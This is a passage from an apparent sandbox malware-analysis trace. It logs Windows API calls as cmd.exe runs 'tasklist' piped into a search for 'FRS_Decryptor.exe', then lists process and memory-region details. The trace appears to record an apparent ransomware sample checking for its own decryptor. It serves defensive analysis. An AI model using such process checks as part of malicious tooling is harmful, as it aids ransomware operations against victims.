(_String1="tasklist", _String2="SETLOCAL") returned 1 [0085.883] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0085.883] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0085.883] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0085.883] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0085.883] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0085.883] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0085.883] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0085.883] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0085.883] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0085.883] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0085.883] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0085.883] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0085.883] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0085.883] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0085.883] SetErrorMode (uMode=0x0) returned 0x0 [0085.884] SetErrorMode (uMode=0x1) returned 0x0 [0085.884] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xfc5228, lpFilePart=0xf6f63c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf6f63c*="Desktop") returned 0x1c [0085.884] SetErrorMode (uMode=0x0) returned 0x1 [0085.884] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0085.884] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0085.888] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0085.888] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0085.888] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf6f3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f3c8) returned 0xffffffff [0085.888] GetLastError () returned 0x2 [0085.889] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0085.889] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf6f3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f3c8) returned 0xfc5530 [0085.889] FindClose (in: hFindFile=0xfc5530 | out: hFindFile=0xfc5530) returned 1 [0085.889] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xf6f3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f3c8) returned 0xffffffff [0085.889] GetLastError () returned 0x2 [0085.889] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xf6f3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f3c8) returned 0xfc5530 [0085.889] FindClose (in: hFindFile=0xfc5530 | out: hFindFile=0xfc5530) returned 1 [0085.889] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0085.889] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0085.889] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0085.889] SetErrorMode (uMode=0x0) returned 0x0 [0085.889] SetErrorMode (uMode=0x1) returned 0x0 [0085.889] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xfca3c0, lpFilePart=0xf6f3e4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf6f3e4*="Desktop") returned 0x1c [0085.889] SetErrorMode (uMode=0x0) returned 0x1 [0085.890] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0085.890] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0085.890] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0085.890] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0085.890] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf6f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f170) returned 0xffffffff [0085.890] GetLastError () returned 0x2 [0085.890] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0085.890] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf6f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f170) returned 0xfc5628 [0085.890] FindClose (in: hFindFile=0xfc5628 | out: hFindFile=0xfc5628) returned 1 [0085.890] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xf6f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f170) returned 0xffffffff [0085.890] GetLastError () returned 0x2 [0085.890] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xf6f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f170) returned 0xfc5628 [0085.890] FindClose (in: hFindFile=0xfc5628 | out: hFindFile=0xfc5628) returned 1 [0085.890] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0085.890] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0085.890] GetConsoleTitleW (in: lpConsoleTitle=0xf6f66c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0085.891] InitializeProcThreadAttributeList (in: lpAttributeList=0xf6f598, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf6f57c | out: lpAttributeList=0xf6f598, lpSize=0xf6f57c) returned 1 [0085.891] UpdateProcThreadAttribute (in: lpAttributeList=0xf6f598, dwFlags=0x0, Attribute=0x60001, lpValue=0xf6f584, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf6f598, lpPreviousValue=0x0) returned 1 [0085.891] GetStartupInfoW (in: lpStartupInfo=0xf6f5d0 | out: lpStartupInfo=0xf6f5d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2f0, hStdError=0x2c)) [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.891] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0085.892] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0085.892] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0085.893] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xf6f520*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf6f56c | out: lpCommandLine="tasklist", lpProcessInformation=0xf6f56c*(hProcess=0x64, hThread=0x60, dwProcessId=0x9a4, dwThreadId=0x72c)) returned 1 [0085.896] CloseHandle (hObject=0x60) returned 1 [0085.896] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0085.896] GetEnvironmentStringsW () returned 0xfc42d8* [0085.896] FreeEnvironmentStringsA (penv="=") returned 1 [0085.896] DeleteProcThreadAttributeList (in: lpAttributeList=0xf6f598 | out: lpAttributeList=0xf6f598) [0085.896] _get_osfhandle (_FileHandle=3) returned 0x54 [0085.896] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0085.896] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0085.896] _close (_FileHandle=5) returned 0 [0085.896] _dup (_FileHandle=0) returned 4 [0085.896] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0085.896] _close (_FileHandle=3) returned 0 [0085.896] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0085.896] SetErrorMode (uMode=0x0) returned 0x0 [0085.896] SetErrorMode (uMode=0x1) returned 0x0 [0085.896] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xfc42e0, lpFilePart=0xf6f63c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf6f63c*="Desktop") returned 0x1c [0085.897] SetErrorMode (uMode=0x0) returned 0x1 [0085.897] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0085.897] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0085.897] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0085.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0085.897] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf6f3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f3c8) returned 0xffffffff [0085.897] GetLastError () returned 0x2 [0085.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0085.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf6f3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f3c8) returned 0xfc5628 [0085.897] FindClose (in: hFindFile=0xfc5628 | out: hFindFile=0xfc5628) returned 1 [0085.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xf6f3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f3c8) returned 0xffffffff [0085.897] GetLastError () returned 0x2 [0085.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xf6f3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f3c8) returned 0xfc5628 [0085.897] FindClose (in: hFindFile=0xfc5628 | out: hFindFile=0xfc5628) returned 1 [0085.897] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0085.897] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0085.898] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0085.898] SetErrorMode (uMode=0x0) returned 0x0 [0085.898] SetErrorMode (uMode=0x1) returned 0x0 [0085.898] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xfc4668, lpFilePart=0xf6f3e4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf6f3e4*="Desktop") returned 0x1c [0085.898] SetErrorMode (uMode=0x0) returned 0x1 [0085.898] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0085.898] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0085.898] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0085.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0085.898] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf6f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f170) returned 0xffffffff [0085.898] GetLastError () returned 0x2 [0085.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0085.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf6f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f170) returned 0xfc04a0 [0085.899] FindClose (in: hFindFile=0xfc04a0 | out: hFindFile=0xfc04a0) returned 1 [0085.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xf6f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f170) returned 0xffffffff [0085.899] GetLastError () returned 0x2 [0085.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xf6f170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf6f170) returned 0xfc04a0 [0085.899] FindClose (in: hFindFile=0xfc04a0 | out: hFindFile=0xfc04a0) returned 1 [0085.899] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0085.899] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0085.899] GetConsoleTitleW (in: lpConsoleTitle=0xf6f66c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0085.899] InitializeProcThreadAttributeList (in: lpAttributeList=0xf6f598, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf6f57c | out: lpAttributeList=0xf6f598, lpSize=0xf6f57c) returned 1 [0085.899] UpdateProcThreadAttribute (in: lpAttributeList=0xf6f598, dwFlags=0x0, Attribute=0x60001, lpValue=0xf6f584, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf6f598, lpPreviousValue=0x0) returned 1 [0085.899] GetStartupInfoW (in: lpStartupInfo=0xf6f5d0 | out: lpStartupInfo=0xf6f5d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2f0, hStdError=0x2c)) [0085.899] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0085.900] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0085.901] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0085.901] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xf6f520*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf6f56c | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xf6f56c*(hProcess=0x60, hThread=0x54, dwProcessId=0x6b0, dwThreadId=0x5f8)) returned 1 [0085.903] CloseHandle (hObject=0x54) returned 1 [0085.903] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0085.903] GetEnvironmentStringsW () returned 0xfcad78* [0085.903] FreeEnvironmentStringsA (penv="=") returned 1 [0085.903] DeleteProcThreadAttributeList (in: lpAttributeList=0xf6f598 | out: lpAttributeList=0xf6f598) [0085.903] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0085.904] _close (_FileHandle=4) returned 0 [0085.904] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0086.336] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xf6f8e0 | out: lpExitCode=0xf6f8e0*=0x0) returned 1 [0086.337] CloseHandle (hObject=0x64) returned 1 [0086.337] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0086.339] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xf6f8e0 | out: lpExitCode=0xf6f8e0*=0x0) returned 1 [0086.339] CloseHandle (hObject=0x60) returned 1 [0086.339] _get_osfhandle (_FileHandle=1) returned 0x2f0 [0086.339] SetConsoleMode (hConsoleHandle=0x2f0, dwMode=0x0) returned 0 [0086.339] _get_osfhandle (_FileHandle=1) returned 0x2f0 [0086.339] GetConsoleMode (in: hConsoleHandle=0x2f0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0086.339] _get_osfhandle (_FileHandle=0) returned 0x24 [0086.339] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0086.339] SetConsoleInputExeNameW () returned 0x1 [0086.339] GetConsoleOutputCP () returned 0x1b5 [0086.339] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0086.339] SetThreadUILanguage (LangId=0x0) returned 0x409 [0086.340] exit (_Code=0) Process: id = "71" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x97bf000" os_pid = "0x9a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "70" os_parent_pid = "0x770" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3788 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 3789 start_va = 0xa00000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 3790 start_va = 0xa20000 end_va = 0xa21fff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 3791 start_va = 0xa30000 end_va = 0xa3efff entry_point = 0x0 region_type = pagefile_backed name = 